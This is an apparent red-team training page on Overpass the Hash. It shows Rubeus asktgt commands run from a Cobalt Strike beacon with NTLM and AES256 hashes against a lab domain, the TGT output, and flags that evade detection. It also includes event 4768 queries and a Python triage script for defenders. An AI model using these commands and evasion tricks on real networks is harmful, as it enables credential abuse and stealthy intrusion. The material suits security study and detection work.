# Overpass the Hash

Overpass the hash is a technique which allows us to request a Kerberos TGT for a user, using their NTLM or AES hash. Elevated privileges are required to obtain user hashes, but not to actually request a ticket.

Rubeus `asktgt` has us covered for this task.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 59fc0f884922b4ce376051134c71e22c
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\jking'
[*] Using domain controller: 10.10.122.10:88

[09/01 10:24:04] [+] received output:
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFmj [...snip...] 5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  jking
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/1/2022 2:23:59 PM
  EndTime                  :  9/2/2022 12:23:59 AM
  RenewTill                :  9/8/2022 2:23:59 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  NytFQCt4OMyeF+BjfPSrbw==
  ASREP (key)              :  59FC0F884922B4CE376051134C71E22C
```

This TGT can then be leveraged via Pass the Ticket.

**OPSEC**

Using an NTLM hash results in a ticket encrypted using RC4 (0x17). This is considered a legacy encryption type and therefore often stands out as anomalous in a modern Windows environment. The "RC4 TGTs" saved search will show all 4768 events where the ticket encryption type is 0x17. It's very likely that the only result there will be the one generated from the above command.

To obtain a TGT encrypted using AES256 (0x12), you guessed it, use the user's AES256 hash instead.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap

[*] Action: Ask TGT

[*] Using aes256_cts_hmac_sha1 hash: 4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\jking'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFuj [...snip...] ljLmlv

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  jking
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/1/2022 2:54:36 PM
  EndTime                  :  9/2/2022 12:54:36 AM
  RenewTill                :  9/8/2022 2:54:36 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  BBLSeA9nnaNeYIcHqf787V0m5Znz1ednGMXh9V9aorE=
  ASREP (key)              :  4A8A74DAAD837AE09E9ECC8C2F1B89F960188CB934DB6D4BBEBADE8318AE57C6
```

You can find the corresponding 4768 event with this query:

```
event.code: 4768 and winlog.event_data.TicketEncryptionType: 0x12 and winlog.event_data.TargetUserName: jking
```

It will be practically indistinguishable from the other TGT requests, with the exception of two fields:

1. The Supplied Realm Name will be dev.cyberbotic.io, instead of DEV.
2. The Ticket Options will be 0x40800010 instead of 0x40810010.
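As an added defender-side example (not code from the original notes or from Rubeus), the following triages 4768 records for the three indicators discussed on this page: the RC4 encryption type from the OPSEC note, the FQDN Supplied Realm Name, and the 0x40800010 Ticket Options. Mapping "Supplied Realm Name" to the `TargetDomainName` field is an assumption, and the sample events are constructed; the third sample mirrors the `/domain:DEV /opsec` request shown later, for which none of these indicators fire.

```python
"""Triage Kerberos 4768 (TGT requested) events for Overpass-the-Hash indicators.

Added example, not from the original notes. Field names follow the
winlog.event_data keys used on this page; the TargetDomainName mapping is assumed.
"""

# KDC option bits (RFC 4120, numbered MSB-first) needed to read the two values above.
KDC_OPTIONS = {
    0x40000000: "forwardable",
    0x00800000: "renewable",
    0x00010000: "canonicalize",
    0x00000010: "renewable-ok",
}
BASELINE_OPTIONS = 0x40810010  # what a domain-joined Windows client normally requests
RC4_HMAC = 0x17                # legacy etype that the "RC4 TGTs" saved search keys on

def decode_options(options: int) -> list[str]:
    """Name the KDC option bits that are set (bits not in the table are ignored)."""
    return [name for bit, name in KDC_OPTIONS.items() if options & bit]

def triage_4768(event: dict) -> list[str]:
    """Return the indicator names that fire for a single 4768 event."""
    data = event["winlog"]["event_data"]
    findings = []
    if int(data["TicketEncryptionType"], 16) == RC4_HMAC:
        findings.append("rc4_tgt")
    opts = int(data["TicketOptions"], 16)
    if opts != BASELINE_OPTIONS:
        # Report which baseline bits are missing, e.g. canonicalize for 0x40800010
        missing = [n for n in decode_options(BASELINE_OPTIONS) if n not in decode_options(opts)]
        findings.append("ticket_options:" + ",".join(missing))
    if "." in data["TargetDomainName"]:
        findings.append("fqdn_realm")  # FQDN supplied where clients send the NetBIOS name
    return findings

def make_event(user: str, realm: str, etype: str, options: str) -> dict:
    """Build a minimal constructed 4768 record in the shape the query above assumes."""
    return {"event": {"code": "4768"}, "winlog": {"event_data": {
        "TargetUserName": user, "TargetDomainName": realm,
        "TicketEncryptionType": etype, "TicketOptions": options}}}

# Constructed samples: the /ntlm run, the /aes256 run, and the /domain:DEV /opsec run.
SAMPLES = {
    "ntlm":   make_event("jking", "dev.cyberbotic.io", "0x17", "0x40800010"),
    "aes256": make_event("jking", "dev.cyberbotic.io", "0x12", "0x40800010"),
    "opsec":  make_event("jking", "DEV", "0x12", "0x40810010"),
}
```

Calling `triage_4768` on each sample shows the AES256 request losing the RC4 indicator but keeping the realm and ticket-option ones, while the `/opsec` request produces no findings from these fields at all.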

The `asktgt` command has two optional parameters that we can use to blend in a bit more.

If no `/domain` is specified, Rubeus uses the FQDN of the domain this computer is in. Instead, we can force it to use the NetBIOS name with `/domain:DEV`. There is also an `/opsec` flag which tells Rubeus to request the TGT in such a way that results in the Ticket Options being 0x40810010.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /domain:DEV /opsec /nowrap
```

**More OPSEC**

Mimikatz can also perform overpass the hash, but in a way that writes into LSASS. Rubeus' method doesn't touch LSASS, but it does generate Kerberos traffic from an anomalous process, as this usually only occurs from LSASS. These can be seen using the "Kerberos Traffic from Suspicious Process" saved search.

The bottom line is that you have to "pick your poison".
